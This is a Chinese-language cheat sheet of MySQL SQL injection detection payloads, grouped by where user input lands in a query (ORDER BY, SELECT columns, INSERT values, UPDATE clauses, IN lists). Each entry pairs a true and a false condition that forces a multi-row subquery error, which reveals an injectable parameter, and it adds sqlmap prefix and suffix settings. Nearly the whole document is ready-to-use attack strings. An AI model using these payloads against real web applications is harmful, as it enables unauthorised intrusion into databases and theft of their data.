整理的 MySQL 各种注入位置的 SQL 注入基本检测语句。每组两条语句只在条件 1=1 / 1=2 上不同：条件为假时才会执行 (select 1 union select 2)，该子查询返回多行而报错，因此两条语句的响应出现差异即可判断该位置存在注入。
order by xx {sql} :
,if((1=1),1,(select 1 union select 2))
,if((1=2),1,(select 1 union select 2))
使用工具的话，可以在 sqlmap 中设置前缀：
,if((1=1
并设置后缀：
),1,(select 1 union select 2))
=======================================================
select xxx( as x) {sql} from xx :
,case when(1=1)then 1 else (select 1 union select 2) end
,case when(1=2)then 1 else (select 1 union select 2) end
=======================================================
select * from xxx order by {sql} :
(case when(1=1) then 1 else (select 1 union select 2) end)
(case when(1=2) then 1 else (select 1 union select 2) end)
or
已存在字段,if((1=1),1,(select 1 union select 2))
已存在字段,if((1=2),1,(select 1 union select 2))
=======================================================
insert into person (number,name) values (1,'{sql}') :
'+(if((1=1),1,(select 1 union select 2)))+'
'+(if((1=2),1,(select 1 union select 2)))+'
or
'+(case when(1=1) then 1 else (select 1 union select 2) end)+'
'+(case when(1=2) then 1 else (select 1 union select 2) end)+'
=======================================================
update xxx set x='{sql}' :
'+(if((1=1),1,(select 1 union select 2)))+'
'+(if((1=2),1,(select 1 union select 2)))+'
or
'+(case when(1=1) then 1 else (select 1 union select 2) end)+'
'+(case when(1=2) then 1 else (select 1 union select 2) end)+'
=======================================================
update xxx set x=x where xx ='{sql}' :
'+(case when(1=1) then 1 else (select 1 union select 2) end)+'
'+(case when(1=2) then 1 else (select 1 union select 2) end)+'
=======================================================
select * from xxx where x in ('xx','{sql}') :
'+if((1=1),1,(select 1 union select 2))+'
'+if((1=2),1,(select 1 union select 2))+'